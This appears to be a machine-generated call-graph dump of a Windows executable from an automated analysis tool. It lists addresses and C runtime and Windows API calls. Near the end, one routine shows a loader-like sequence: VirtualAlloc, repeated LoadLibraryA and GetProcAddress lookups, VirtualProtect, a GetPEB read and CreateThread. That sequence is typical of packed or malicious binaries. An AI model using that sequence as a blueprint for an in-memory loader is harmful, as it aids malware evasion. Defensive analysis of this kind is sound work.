__invoke_watson 10 API calls 13755->13744 13812 4166ec 13756->13812 13757->13756 13760 410135 13759->13760 13850 41010a GetModuleHandleW 13760->13850 13765 40e30e 13763->13765 13766 40e344 13765->13766 13767 40e325 Sleep 13765->13767 13853 408389 13765->13853 13766->13701 13766->13702 13768 40e33a 13767->13768 13768->13765 13768->13766 13883 40f14b LeaveCriticalSection 13769->13883 13771 40f223 13771->13699 13773 416864 13772->13773 13774 41059b 13773->13774 13775 40d524 ___strgtold12_l 67 API calls 13773->13775 13774->13720 13774->13722 13776 416887 13775->13776 13777 40a597 ___strgtold12_l 6 API calls 13776->13777 13777->13774 13779 410da0 13778->13779 13780 410d99 13778->13780 13781 40d524 ___strgtold12_l 67 API calls 13779->13781 13780->13779 13784 410dc6 13780->13784 13786 410da5 13781->13786 13782 40a597 ___strgtold12_l 6 API calls 13783 410464 13782->13783 13783->13738 13787 40a46f 13783->13787 13784->13783 13785 40d524 ___strgtold12_l 67 API calls 13784->13785 13785->13786 13786->13782 13839 4082c0 13787->13839 13789 40a49c IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 13790 40a578 GetCurrentProcess TerminateProcess 13789->13790 13792 40a56c __invoke_watson 13789->13792 13841 40a7da 13790->13841 13792->13790 13793 40a595 13793->13738 13799 41486d 13794->13799 13795 414871 13796 40d524 ___strgtold12_l 67 API calls 13795->13796 13797 4104e9 13795->13797 13798 41488d 13796->13798 13797->13744 13797->13755 13800 40a597 ___strgtold12_l 6 API calls 13798->13800 13799->13795 13799->13797 13801 4148b7 13799->13801 13800->13797 13801->13797 13802 40d524 ___strgtold12_l 67 API calls 13801->13802 13802->13798 13804 4147ff 13803->13804 13807 4147f8 13803->13807 13805 40d524 ___strgtold12_l 67 API calls 13804->13805 13806 414804 13805->13806 13808 40a597 ___strgtold12_l 6 API calls 13806->13808 13807->13804 13810 414833 13807->13810 13809 41050f 13808->13809 13809->13750 13809->13752 13810->13809 13811 40d524 ___strgtold12_l 67 API calls 13810->13811 13811->13806 13813 410676 _raise 6 API calls 13812->13813 13814 4166fc 13813->13814 13815 41670f LoadLibraryA 13814->13815 13819 416797 13814->13819 13817 416724 GetProcAddress 13815->13817 13818 416839 13815->13818 13816 4167c1 13822 41067f __decode_pointer 6 API calls 13816->13822 13836 4167ec 13816->13836 13817->13818 13820 41673a 13817->13820 13818->13759 13819->13816 13823 41067f __decode_pointer 6 API calls 13819->13823 13824 410604 __encode_pointer 6 API calls 13820->13824 13821 41067f __decode_pointer 6 API calls 13821->13818 13825 416804 13822->13825 13826 4167b4 13823->13826 13827 416740 GetProcAddress 13824->13827 13834 41067f __decode_pointer 6 API calls 13825->13834 13825->13836 13828 41067f __decode_pointer 6 API calls 13826->13828 13829 410604 __encode_pointer 6 API calls 13827->13829 13828->13816 13830 416755 GetProcAddress 13829->13830 13831 410604 __encode_pointer 6 API calls 13830->13831 13832 41676a GetProcAddress 13831->13832 13833 410604 __encode_pointer 6 API calls 13832->13833 13835 41677f 13833->13835 13834->13836 13835->13819 13837 416789 GetProcAddress 13835->13837 13836->13821 13838 410604 __encode_pointer 6 API calls 13837->13838 13838->13819 13840 4082cc __VEC_memzero 13839->13840 13840->13789 13842 40a7e2 13841->13842 13843 40a7e4 IsDebuggerPresent 13841->13843 13842->13793 13849 411415 13843->13849 13846 411e3a SetUnhandledExceptionFilter UnhandledExceptionFilter 13847 411e57 __invoke_watson 13846->13847 13848 411e5f GetCurrentProcess TerminateProcess 13846->13848 13847->13848 13848->13793 13849->13846 13851 41012e ExitProcess 13850->13851 13852 41011e GetProcAddress 13850->13852 13852->13851 13854 40843c 13853->13854 13864 40839b 13853->13864 13855 4105dc _realloc 6 API calls 13854->13855 13856 408442 13855->13856 13858 40d524 ___strgtold12_l 66 API calls 13856->13858 13857 410594 __FF_MSGBANNER 66 API calls 13862 4083ac 13857->13862 13870 408434 13858->13870 13860 4103e9 __NMSG_WRITE 66 API calls 13860->13862 13861 4083f8 RtlAllocateHeap 13861->13864 13862->13857 13862->13860 13863 410135 _malloc 3 API calls 13862->13863 13862->13864 13863->13862 13864->13861 13864->13862 13865 408428 13864->13865 13866 4105dc _realloc 6 API calls 13864->13866 13868 40842d 13864->13868 13864->13870 13871 40833a 13864->13871 13867 40d524 ___strgtold12_l 66 API calls 13865->13867 13866->13864 13867->13868 13869 40d524 ___strgtold12_l 66 API calls 13868->13869 13869->13870 13870->13765 13872 408346 _raise 13871->13872 13873 408377 _raise 13872->13873 13874 40f225 __lock 67 API calls 13872->13874 13873->13864 13875 40835c 13874->13875 13876 40fa37 ___sbh_alloc_block 5 API calls 13875->13876 13877 408367 13876->13877 13879 408380 13877->13879 13882 40f14b LeaveCriticalSection 13879->13882 13881 408387 13881->13873 13882->13881 13883->13771 13885 40f5b1 HeapReAlloc 13884->13885 13886 40f5e5 HeapAlloc 13884->13886 13887 40f5d3 13885->13887 13890 40f5cf 13885->13890 13888 40f608 VirtualAlloc 13886->13888 13886->13890 13887->13886 13889 40f622 HeapFree 13888->13889 13888->13890 13889->13890 13890->13633 13892 40f665 VirtualAlloc 13891->13892 13894 40f6ac 13892->13894 13894->13637 13895->13640 13896->13573 13915 40f14b LeaveCriticalSection 13897->13915 13899 410802 13899->13583 13901 40c5d8 InterlockedIncrement 13900->13901 13902 40c5db 13900->13902 13901->13902 13903 40c5e5 InterlockedIncrement 13902->13903 13904 40c5e8 13902->13904 13903->13904 13905 40c5f2 InterlockedIncrement 13904->13905 13906 40c5f5 13904->13906 13905->13906 13907 40c5ff InterlockedIncrement 13906->13907 13909 40c602 13906->13909 13907->13909 13908 40c61b InterlockedIncrement 13908->13909 13909->13908 13910 40c636 InterlockedIncrement 13909->13910 13911 40c62b InterlockedIncrement 13909->13911 13910->13586 13911->13909 13916 40f14b LeaveCriticalSection 13912->13916 13914 410850 13914->13588 13915->13899 13916->13914 13917->13404 13919 4116ca 13918->13919 13922 411737 13919->13922 13928 417a8c 13919->13928 13921 411835 13921->13448 13921->13450 13922->13921 13923 417a8c 77 API calls _parse_cmdline 13922->13923 13923->13922 13925 4147d2 13924->13925 13926 4147d9 13924->13926 14150 41462f 13925->14150 13926->13444 13931 417a39 13928->13931 13934 40d97b 13931->13934 13935 40d98e 13934->13935 13941 40d9db 13934->13941 13942 4108cb 13935->13942 13938 40d9bb 13938->13941 13962 41432a 13938->13962 13941->13919 13943 410852 __getptd_noexit 67 API calls 13942->13943 13944 4108d3 13943->13944 13945 40d993 13944->13945 13946 4100e1 __amsg_exit 67 API calls 13944->13946 13945->13938 13947 40c746 13945->13947 13946->13945 13948 40c752 _raise 13947->13948 13949 4108cb __getptd 67 API calls 13948->13949 13950 40c757 13949->13950 13951 40c785 13950->13951 13953 40c769 13950->13953 13952 40f225 __lock 67 API calls 13951->13952 13954 40c78c 13952->13954 13955 4108cb __getptd 67 API calls 13953->13955 13978 40c708 13954->13978 13958 40c76e 13955->13958 13960 40c77c _raise 13958->13960 13961 4100e1 __amsg_exit 67 API calls 13958->13961 13960->13938 13961->13960 13963 414336 _raise 13962->13963 13964 4108cb __getptd 67 API calls 13963->13964 13965 41433b 13964->13965 13966 41434d 13965->13966 13967 40f225 __lock 67 API calls 13965->13967 13969 41435b _raise 13966->13969 13971 4100e1 __amsg_exit 67 API calls 13966->13971 13968 41436b 13967->13968 13970 4143b4 13968->13970 13973 414382 InterlockedDecrement 13968->13973 13974 41439c InterlockedIncrement 13968->13974 13969->13941 14146 4143c5 13970->14146 13971->13969 13973->13974 13975 41438d 13973->13975 13974->13970 13975->13974 13976 40822f ___getlocaleinfo 67 API calls 13975->13976 13977 41439b 13976->13977 13977->13974 13979 40c70c 13978->13979 13985 40c73e 13978->13985 13980 40c5ba ___addlocaleref 8 API calls 13979->13980 13979->13985 13981 40c71f 13980->13981 13981->13985 13989 40c649 13981->13989 13986 40c7b0 13985->13986 14145 40f14b LeaveCriticalSection 13986->14145 13988 40c7b7 13988->13958 13990 40c65a InterlockedDecrement 13989->13990 13991 40c6dd 13989->13991 13992 40c672 13990->13992 13993 40c66f InterlockedDecrement 13990->13993 13991->13985 14003 40c471 13991->14003 13994 40c67c InterlockedDecrement 13992->13994 13995 40c67f 13992->13995 13993->13992 13994->13995 13996 40c689 InterlockedDecrement 13995->13996 13997 40c68c 13995->13997 13996->13997 13998 40c696 InterlockedDecrement 13997->13998 13999 40c699 13997->13999 13998->13999 14000 40c6b2 InterlockedDecrement 13999->14000 14001 40c6c2 InterlockedDecrement 13999->14001 14002 40c6cd InterlockedDecrement 13999->14002 14000->13999 14001->13999 14002->13991 14004 40c488 14003->14004 14005 40c4f5 14003->14005 14004->14005 14011 40c4bc 14004->14011 14016 40822f ___getlocaleinfo 67 API calls 14004->14016 14006 40c542 14005->14006 14007 40822f ___getlocaleinfo 67 API calls 14005->14007 14022 40c569 14006->14022 14057 413993 14006->14057 14009 40c516 14007->14009 14013 40822f ___getlocaleinfo 67 API calls 14009->14013 14012 40c4dd 14011->14012 14019 40822f ___getlocaleinfo 67 API calls 14011->14019 14014 40822f ___getlocaleinfo 67 API calls 14012->14014 14018 40c529 14013->14018 14023 40c4ea 14014->14023 14015 40c5ae 14024 40822f ___getlocaleinfo 67 API calls 14015->14024 14025 40c4b1 14016->14025 14017 40822f ___getlocaleinfo 67 API calls 14017->14022 14021 40822f ___getlocaleinfo 67 API calls 14018->14021 14026 40c4d2 14019->14026 14020 40822f 67 API calls ___getlocaleinfo 14020->14022 14027 40c537 14021->14027 14022->14015 14022->14020 14028 40822f ___getlocaleinfo 67 API calls 14023->14028 14029 40c5b4 14024->14029 14033 413db0 14025->14033 14049 413ba1 14026->14049 14032 40822f ___getlocaleinfo 67 API calls 14027->14032 14028->14005 14029->13985 14032->14006 14034 413dbd 14033->14034 14048 413e3a 14033->14048 14035 413dce 14034->14035 14036 40822f ___getlocaleinfo 67 API calls 14034->14036 14037 413de0 14035->14037 14038 40822f ___getlocaleinfo 67 API calls 14035->14038 14036->14035 14039 40822f ___getlocaleinfo 67 API calls 14037->14039 14042 413df2 14037->14042 14038->14037 14039->14042 14040 413e04 14041 413e16 14040->14041 14044 40822f ___getlocaleinfo 67 API calls 14040->14044 14045 413e28 14041->14045 14046 40822f ___getlocaleinfo 67 API calls 14041->14046 14042->14040 14043 40822f ___getlocaleinfo 67 API calls 14042->14043 14043->14040 14044->14041 14047 40822f ___getlocaleinfo 67 API calls 14045->14047 14045->14048 14046->14045 14047->14048 14048->14011 14050 413bae 14049->14050 14056 413be2 14049->14056 14051 413bbe 14050->14051 14052 40822f ___getlocaleinfo 67 API calls 14050->14052 14053 413bd0 14051->14053 14054 40822f ___getlocaleinfo 67 API calls 14051->14054 14052->14051 14055 40822f ___getlocaleinfo 67 API calls 14053->14055 14053->14056 14054->14053 14055->14056 14056->14012 14058 4139a4 14057->14058 14144 40c562 14057->14144 14059 40822f ___getlocaleinfo 67 API calls 14058->14059 14060 4139ac 14059->14060 14061 40822f ___getlocaleinfo 67 API calls 14060->14061 14062 4139b4 14061->14062 14063 40822f ___getlocaleinfo 67 API calls 14062->14063 14064 4139bc 14063->14064 14065 40822f ___getlocaleinfo 67 API calls 14064->14065 14066 4139c4 14065->14066 14067 40822f ___getlocaleinfo 67 API calls 14066->14067 14068 4139cc 14067->14068 14069 40822f ___getlocaleinfo 67 API calls 14068->14069 14070 4139d4 14069->14070 14071 40822f ___getlocaleinfo 67 API calls 14070->14071 14072 4139db 14071->14072 14073 40822f ___getlocaleinfo 67 API calls 14072->14073 14074 4139e3 14073->14074 14075 40822f ___getlocaleinfo 67 API calls 14074->14075 14076 4139eb 14075->14076 14077 40822f ___getlocaleinfo 67 API calls 14076->14077 14078 4139f3 14077->14078 14079 40822f ___getlocaleinfo 67 API calls 14078->14079 14080 4139fb 14079->14080 14081 40822f ___getlocaleinfo 67 API calls 14080->14081 14082 413a03 14081->14082 14083 40822f ___getlocaleinfo 67 API calls 14082->14083 14084 413a0b 14083->14084 14085 40822f ___getlocaleinfo 67 API calls 14084->14085 14086 413a13 14085->14086 14087 40822f ___getlocaleinfo 67 API calls 14086->14087 14088 413a1b 14087->14088 14089 40822f ___getlocaleinfo 67 API calls 14088->14089 14090 413a23 14089->14090 14091 40822f ___getlocaleinfo 67 API calls 14090->14091 14092 413a2e 14091->14092 14093 40822f ___getlocaleinfo 67 API calls 14092->14093 14094 413a36 14093->14094 14095 40822f ___getlocaleinfo 67 API calls 14094->14095 14096 413a3e 14095->14096 14097 40822f ___getlocaleinfo 67 API calls 14096->14097 14098 413a46 14097->14098 14099 40822f ___getlocaleinfo 67 API calls 14098->14099 14100 413a4e 14099->14100 14101 40822f ___getlocaleinfo 67 API calls 14100->14101 14102 413a56 14101->14102 14103 40822f ___getlocaleinfo 67 API calls 14102->14103 14104 413a5e 14103->14104 14105 40822f ___getlocaleinfo 67 API calls 14104->14105 14106 413a66 14105->14106 14107 40822f ___getlocaleinfo 67 API calls 14106->14107 14108 413a6e 14107->14108 14109 40822f ___getlocaleinfo 67 API calls 14108->14109 14110 413a76 14109->14110 14111 40822f ___getlocaleinfo 67 API calls 14110->14111 14112 413a7e 14111->14112 14113 40822f ___getlocaleinfo 67 API calls 14112->14113 14114 413a86 14113->14114 14115 40822f ___getlocaleinfo 67 API calls 14114->14115 14116 413a8e 14115->14116 14117 40822f ___getlocaleinfo 67 API calls 14116->14117 14118 413a96 14117->14118 14119 40822f ___getlocaleinfo 67 API calls 14118->14119 14120 413a9e 14119->14120 14121 40822f ___getlocaleinfo 67 API calls 14120->14121 14122 413aa6 14121->14122 14123 40822f ___getlocaleinfo 67 API calls 14122->14123 14124 413ab4 14123->14124 14125 40822f ___getlocaleinfo 67 API calls 14124->14125 14126 413abf 14125->14126 14127 40822f ___getlocaleinfo 67 API calls 14126->14127 14128 413aca 14127->14128 14129 40822f ___getlocaleinfo 67 API calls 14128->14129 14130 413ad5 14129->14130 14131 40822f ___getlocaleinfo 67 API calls 14130->14131 14132 413ae0 14131->14132 14133 40822f ___getlocaleinfo 67 API calls 14132->14133 14134 413aeb 14133->14134 14135 40822f ___getlocaleinfo 67 API calls 14134->14135 14136 413af6 14135->14136 14137 40822f ___getlocaleinfo 67 API calls 14136->14137 14138 413b01 14137->14138 14139 40822f ___getlocaleinfo 67 API calls 14138->14139 14140 413b0c 14139->14140 14141 40822f ___getlocaleinfo 67 API calls 14140->14141 14142 413b17 14141->14142 14143 40822f ___getlocaleinfo 67 API calls 14142->14143 14143->14144 14144->14017 14145->13988 14149 40f14b LeaveCriticalSection 14146->14149 14148 4143cc 14148->13966 14149->14148 14151 41463b _raise 14150->14151 14152 4108cb __getptd 67 API calls 14151->14152 14153 414644 14152->14153 14154 41432a _LocaleUpdate::_LocaleUpdate 69 API calls 14153->14154 14155 41464e 14154->14155 14181 4143ce 14155->14181 14158 40e305 __malloc_crt 67 API calls 14159 41466f 14158->14159 14160 41478e _raise 14159->14160 14188 41444a 14159->14188 14160->13926 14163 41479b 14163->14160 14168 4147ae 14163->14168 14169 40822f ___getlocaleinfo 67 API calls 14163->14169 14164 41469f InterlockedDecrement 14165 4146c0 InterlockedIncrement 14164->14165 14166 4146af 14164->14166 14165->14160 14167 4146d6 14165->14167 14166->14165 14171 40822f ___getlocaleinfo 67 API calls 14166->14171 14167->14160 14173 40f225 __lock 67 API calls 14167->14173 14170 40d524 ___strgtold12_l 67 API calls 14168->14170 14169->14168 14170->14160 14172 4146bf 14171->14172 14172->14165 14175 4146ea InterlockedDecrement 14173->14175 14176 414766 14175->14176 14177 414779 InterlockedIncrement 14175->14177 14176->14177 14179 40822f ___getlocaleinfo 67 API calls 14176->14179 14198 414790 14177->14198 14180 414778 14179->14180 14180->14177 14182 40d97b _LocaleUpdate::_LocaleUpdate 77 API calls 14181->14182 14183 4143e2 14182->14183 14184 41440b 14183->14184 14185 4143ed GetOEMCP 14183->14185 14186 414410 GetACP 14184->14186 14187 4143fd 14184->14187 14185->14187 14186->14187 14187->14158 14187->14160 14189 4143ce getSystemCP 79 API calls 14188->14189 14190 41446a 14189->14190 14191 414475 setSBCS 14190->14191 14194 4144b9 IsValidCodePage 14190->14194 14197 4144de _memset __setmbcp_nolock 14190->14197 14192 40a7da ___getlocaleinfo 5 API calls 14191->14192 14193 41462d 14192->14193 14193->14163 14193->14164 14194->14191 14195 4144cb GetCPInfo 14194->14195 14195->14191 14195->14197 14201 414197 GetCPInfo 14197->14201 14334 40f14b LeaveCriticalSection 14198->14334 14200 414797 14200->14160 14203 4141cb _memset 14201->14203 14210 41427d 14201->14210 14211 415276 14203->14211 14205 40a7da ___getlocaleinfo 5 API calls 14207 414328 14205->14207 14207->14197 14209 40dda7 ___crtLCMapStringA 102 API calls 14209->14210 14210->14205 14212 40d97b _LocaleUpdate::_LocaleUpdate 77 API calls 14211->14212 14213 415289 14212->14213 14221 4150bc 14213->14221 14216 40dda7 14217 40d97b _LocaleUpdate::_LocaleUpdate 77 API calls 14216->14217 14218 40ddba 14217->14218 14287 40da02 14218->14287 14222 415108 14221->14222 14223 4150dd GetStringTypeW 14221->14223 14224 4150f5 14222->14224 14226 4151ef 14222->14226 14223->14224 14225 4150fd GetLastError 14223->14225 14227 415141 MultiByteToWideChar 14224->14227 14235 4151e9 14224->14235 14225->14222 14249 41554e GetLocaleInfoA 14226->14249 14231 41516e 14227->14231 14227->14235 14229 40a7da ___getlocaleinfo 5 API calls 14230 414238 14229->14230 14230->14216 14237 408389 _malloc 67 API calls 14231->14237 14243 415183 _memset __crtGetLocaleInfoA_stat 14231->14243 14232 415240 GetStringTypeA 14232->14235 14236 41525b 14232->14236 14234 4151bc MultiByteToWideChar 14240 4151e3 14234->14240 14241 4151d2 GetStringTypeW 14234->14241 14235->14229 14242 40822f ___getlocaleinfo 67 API calls 14236->14242 14237->14243 14245 40d95b 14240->14245 14241->14240 14242->14235 14243->14234 14243->14235 14246 40d967 14245->14246 14247 40d978 14245->14247 14246->14247 14248 40822f ___getlocaleinfo 67 API calls 14246->14248 14247->14235 14248->14247 14250 415581 14249->14250 14251 41557c 14249->14251 14280 4186af 14250->14280 14253 40a7da ___getlocaleinfo 5 API calls 14251->14253 14254 415213 14253->14254 14254->14232 14254->14235 14255 415597 14254->14255 14256 4155d7 GetCPInfo 14255->14256 14272 415661 14255->14272 14257 41564c MultiByteToWideChar 14256->14257 14258 4155ee 14256->14258 14263 415607 _strlen 14257->14263 14257->14272 14258->14257 14260 4155f4 GetCPInfo 14258->14260 14259 40a7da ___getlocaleinfo 5 API calls 14261 415234 14259->14261 14260->14257 14262 415601 14260->14262 14261->14232 14261->14235 14262->14257 14262->14263 14264 408389 _malloc 67 API calls 14263->14264 14268 415639 _memset __crtGetLocaleInfoA_stat 14263->14268 14264->14268 14265 415696 MultiByteToWideChar 14266 4156cd 14265->14266 14267 4156ae 14265->14267 14269 40d95b __freea 67 API calls 14266->14269 14270 4156d2 14267->14270 14271 4156b5 WideCharToMultiByte 14267->14271 14268->14265 14268->14272 14269->14272 14273 4156f1 14270->14273 14274 4156dd WideCharToMultiByte 14270->14274 14271->14266 14272->14259 14275 40e34a __calloc_crt 67 API calls 14273->14275 14274->14266 14274->14273 14276 4156f9 14275->14276 14276->14266 14277 415702 WideCharToMultiByte 14276->14277 14277->14266 14278 415714 14277->14278 14279 40822f ___getlocaleinfo 67 API calls 14278->14279 14279->14266 14283 41ab13 14280->14283 14284 41ab2c 14283->14284 14285 41a8e4 strtoxl 91 API calls 14284->14285 14286 4186c0 14285->14286 14286->14251 14288 40da23 LCMapStringW 14287->14288 14292 40da3e 14287->14292 14289 40da46 GetLastError 14288->14289 14288->14292 14289->14292 14290 40dc3c 14294 41554e ___ansicp 91 API calls 14290->14294 14291 40da98 14293 40dab1 MultiByteToWideChar 14291->14293 14315 40dc33 14291->14315 14292->14290 14292->14291 14302 40dade 14293->14302 14293->14315 14296 40dc64 14294->14296 14295 40a7da ___getlocaleinfo 5 API calls 14297 40dda5 14295->14297 14298 40dd58 LCMapStringA 14296->14298 14299 40dc7d 14296->14299 14296->14315 14297->14209 14333 40dcb4 14298->14333 14300 415597 ___convertcp 74 API calls 14299->14300 14304 40dc8f 14300->14304 14301 40db2f MultiByteToWideChar 14305 40db48 LCMapStringW 14301->14305 14306 40dc2a 14301->14306 14303 408389 _malloc 67 API calls 14302->14303 14312 40daf7 __crtGetLocaleInfoA_stat 14302->14312 14303->14312 14308 40dc99 LCMapStringA 14304->14308 14304->14315 14305->14306 14310 40db69 14305->14310 14309 40d95b __freea 67 API calls 14306->14309 14307 40dd7f 14314 40822f ___getlocaleinfo 67 API calls 14307->14314 14307->14315 14318 40dcbb 14308->14318 14308->14333 14309->14315 14313 40db72 14310->14313 14317 40db9b 14310->14317 14311 40822f ___getlocaleinfo 67 API calls 14311->14307 14312->14301 14312->14315 14313->14306 14316 40db84 LCMapStringW 14313->14316 14314->14315 14315->14295 14316->14306 14320 40dbb6 __crtGetLocaleInfoA_stat 14317->14320 14322 408389 _malloc 67 API calls 14317->14322 14321 40dccc _memset __crtGetLocaleInfoA_stat 14318->14321 14323 408389 _malloc 67 API calls 14318->14323 14319 40dbea LCMapStringW 14324 40dc02 WideCharToMultiByte 14319->14324 14325 40dc24 14319->14325 14320->14306 14320->14319 14327 40dd0a LCMapStringA 14321->14327 14321->14333 14322->14320 14323->14321 14324->14325 14326 40d95b __freea 67 API calls 14325->14326 14326->14306 14328 40dd26 14327->14328 14329 40dd2a 14327->14329 14332 40d95b __freea 67 API calls 14328->14332 14331 415597 ___convertcp 74 API calls 14329->14331 14331->14328 14332->14333 14333->14307 14333->14311 14334->14200 14336 40efcc 14335->14336 14337 410604 __encode_pointer 6 API calls 14336->14337 14338 40efe4 14336->14338 14337->14336 14338->13471 14342 40b486 14339->14342 14341 40b4cf 14341->13473 14343 40b492 _raise 14342->14343 14350 41014d 14343->14350 14349 40b4b3 _raise 14349->14341 14351 40f225 __lock 67 API calls 14350->14351 14352 40b497 14351->14352 14353 40b39b 14352->14353 14354 41067f __decode_pointer 6 API calls 14353->14354 14355 40b3af 14354->14355 14356 41067f __decode_pointer 6 API calls 14355->14356 14357 40b3bf 14356->14357 14366 40b442 14357->14366 14373 413212 14357->14373 14359 40b429 14360 410604 __encode_pointer 6 API calls 14359->14360 14362 40b437 14360->14362 14361 40b3dd 14361->14359 14363 40b401 14361->14363 14386 40e396 14361->14386 14364 410604 __encode_pointer 6 API calls 14362->14364 14363->14366 14367 40e396 __realloc_crt 73 API calls 14363->14367 14368 40b417 14363->14368 14364->14366 14370 40b4bc 14366->14370 14367->14368 14368->14366 14369 410604 __encode_pointer 6 API calls 14368->14369 14369->14359 14435 410156 14370->14435 14374 41321e _raise 14373->14374 14375 41324b 14374->14375 14376 41322e 14374->14376 14377 41328c HeapSize 14375->14377 14379 40f225 __lock 67 API calls 14375->14379 14378 40d524 ___strgtold12_l 67 API calls 14376->14378 14382 413243 _raise 14377->14382 14380 413233 14378->14380 14383 41325b ___sbh_find_block 14379->14383 14381 40a597 ___strgtold12_l 6 API calls 14380->14381 14381->14382 14382->14361 14391 4132ac 14383->14391 14388 40e39f 14386->14388 14389 40e3de 14388->14389 14390 40e3bf Sleep 14388->14390 14395 415abc 14388->14395 14389->14363 14390->14388 14394 40f14b LeaveCriticalSection 14391->14394 14393 413287 14393->14377 14393->14382 14394->14393 14396 415ac8 _raise 14395->14396 14397 415add 14396->14397 14398 415acf 14396->14398 14400 415af0 14397->14400 14401 415ae4 14397->14401 14399 408389 _malloc 67 API calls 14398->14399 14403 415ad7 _raise _realloc 14399->14403 14409 415c62 14400->14409 14429 415afd _realloc ___sbh_resize_block ___sbh_find_block 14400->14429 14402 40822f ___getlocaleinfo 67 API calls 14401->14402 14402->14403 14403->14388 14404 415c95 14405 4105dc _realloc 6 API calls 14404->14405 14408 415c9b 14405->14408 14406 40f225 __lock 67 API calls 14406->14429 14407 415c67 HeapReAlloc 14407->14403 14407->14409 14410 40d524 ___strgtold12_l 67 API calls 14408->14410 14409->14404 14409->14407 14411 415cb9 14409->14411 14412 4105dc _realloc 6 API calls 14409->14412 14415 415caf 14409->14415 14410->14403 14411->14403 14413 40d524 ___strgtold12_l 67 API calls 14411->14413 14412->14409 14416 415cc2 GetLastError 14413->14416 14417 40d524 ___strgtold12_l 67 API calls 14415->14417 14416->14403 14419 415c30 14417->14419 14418 415b88 HeapAlloc 14418->14429 14419->14403 14421 415c35 GetLastError 14419->14421 14420 415bdd HeapReAlloc 14420->14429 14421->14403 14422 40fa37 ___sbh_alloc_block 5 API calls 14422->14429 14423 415c48 14423->14403 14425 40d524 ___strgtold12_l 67 API calls 14423->14425 14424 4105dc _realloc 6 API calls 14424->14429 14426 415c55 14425->14426 14426->14403 14426->14416 14427 415c2b 14428 40d524 ___strgtold12_l 67 API calls 14427->14428 14428->14419 14429->14403 14429->14404 14429->14406 14429->14418 14429->14420 14429->14422 14429->14423 14429->14424 14429->14427 14430 40f288 VirtualFree VirtualFree HeapFree __VEC_memcpy ___sbh_free_block 14429->14430 14431 415c00 14429->14431 14430->14429 14434 40f14b LeaveCriticalSection 14431->14434 14433 415c07 14433->14429 14434->14433 14438 40f14b LeaveCriticalSection 14435->14438 14437 40b4c1 14437->14349 14438->14437 14440 41e182 14439->14440 14442 41e196 14439->14442 14441 4039b0 77 API calls 14440->14441 14441->14442 14442->13493 14444 41dbbb 14443->14444 14445 408389 _malloc 67 API calls 14444->14445 14452 41e0a9 14444->14452 14446 41ded1 14445->14446 14446->14452 14474 41d910 14446->14474 14448 41df6a _memset 14449 40822f ___getlocaleinfo 67 API calls 14448->14449 14450 41e08d 14449->14450 14478 41c000 14450->14478 14452->13494 14455 4039e2 std::locale::_Init 14453->14455 14498 403080 14455->14498 14456 403a46 std::ios_base::width 14503 402a00 14456->14503 14461 402560 14462 403080 76 API calls 14461->14462 14463 402598 14462->14463 14473 4025d5 14463->14473 14682 402780 14463->14682 14465 402a00 75 API calls 14467 4026a3 14465->14467 14469 403120 76 API calls 14467->14469 14471 4026b1 14469->14471 14471->13501 14473->14465 14475 41d967 14474->14475 14476 41d971 14475->14476 14477 41dac8 GetModuleHandleA GetProcAddress VirtualProtect 14475->14477 14476->14448 14477->14448 14479 41c00e 14478->14479 14480 41c31b 14479->14480 14481 41c367 VirtualAlloc 14479->14481 14480->14452 14484 41c394 14481->14484 14482 41cb51 LoadLibraryA 14483 41cb8e 14482->14483 14482->14484 14485 41cbde GetProcAddress 14483->14485 14488 41cc70 14483->14488 14484->14480 14484->14482 14484->14488 14486 41cbb9 14485->14486 14487 41cc26 GetProcAddress 14485->14487 14486->14483 14487->14486 14489 41cdbb GetPEB 14488->14489 14494 41ccb5 VirtualProtect 14488->14494 14490 41d57d CreateThread 14489->14490 14491 41d53e 14489->14491 14492 41d752 WaitForSingleObject 14490->14492 14493 41d732 Sleep 14490->14493 14495 41d553 lstrlenW 14491->14495 14492->14480 14496 41d74f 14493->14496 14494->14452 14495->14490 14496->14492 14513 403560 14498->14513 14500 4030d7 14500->14456 14501 403093 14501->14500 14517 402950 14501->14517 14504 402a26 14503->14504 14505 402a0d std::ios_base::fail 14503->14505 14507 403120 14504->14507 14528 402b50 14505->14528 14508 40312c 14507->14508 14509 40313d 14508->14509 14667 403460 14508->14667 14671 4035d0 14509->14671 14515 403585 14513->14515 14514 4035a4 14514->14501 14515->14514 14521 4035b0 14515->14521 14519 402972 std::ios_base::fail 14517->14519 14518 402a00 75 API calls 14520 4029b4 14518->14520 14519->14518 14520->14500 14524 4079b6 14521->14524 14527 408138 EnterCriticalSection 14524->14527 14526 4035c2 14526->14514 14527->14526 14529 402b62 14528->14529 14532 402b90 14529->14532 14533 402bc7 14532->14533 14560 402b84 14532->14560 14534 402bdd 14533->14534 14535 402bcf 14533->14535 14537 402bf4 14534->14537 14538 402c28 14534->14538 14563 40898b 14535->14563 14566 4024e0 14537->14566 14539 402c79 14538->14539 14540 402c3f 14538->14540 14542 4024e0 std::_String_base::_Xlen 75 API calls 14539->14542 14543 4024e0 std::_String_base::_Xlen 75 API calls 14540->14543 14546 402c89 14542->14546 14547 402c4f 14543->14547 14549 402d80 std::bad_exception::bad_exception 75 API calls 14546->14549 14550 402d80 std::bad_exception::bad_exception 75 API calls 14547->14550 14552 402c9b 14549->14552 14553 402c5e 14550->14553 14551 40898b __CxxThrowException@8 RaiseException 14554 402c1b 14551->14554 14555 40898b __CxxThrowException@8 RaiseException 14552->14555 14556 40898b __CxxThrowException@8 RaiseException 14553->14556 14575 402520 14554->14575 14558 402cac 14555->14558 14559 402c6c 14556->14559 14561 402520 std::runtime_error::~runtime_error 67 API calls 14558->14561 14562 402520 std::runtime_error::~runtime_error 67 API calls 14559->14562 14560->14504 14561->14560 14562->14560 14564 4089c0 RaiseException 14563->14564 14565 4089b4 14563->14565 14564->14560 14565->14564 14567 4024f1 std::_String_base::_Xlen 14566->14567 14578 402aa0 14567->14578 14569 402505 14582 402a50 14569->14582 14572 402d80 14657 402db0 14572->14657 14576 402aa0 std::locale::_Locimp::~_Locimp 67 API calls 14575->14576 14577 402533 14576->14577 14577->14560 14579 402ab3 14578->14579 14580 402ab1 std::locale::_Locimp::~_Locimp 14578->14580 14579->14580 14586 403e20 14579->14586 14580->14569 14583 402a60 std::locale::_Init 14582->14583 14596 4031e0 14583->14596 14585 402511 14585->14572 14587 403e29 std::locale::_Locimp::~_Locimp 14586->14587 14590 406220 14587->14590 14593 406240 14590->14593 14594 40a5d8 _memcpy_s 67 API calls 14593->14594 14595 403e46 14594->14595 14595->14580 14597 4031f3 std::locale::_Init 14596->14597 14598 40321a 14597->14598 14599 4031fa std::locale::_Locimp::~_Locimp 14597->14599 14618 403360 14598->14618 14605 402ec0 14599->14605 14602 403218 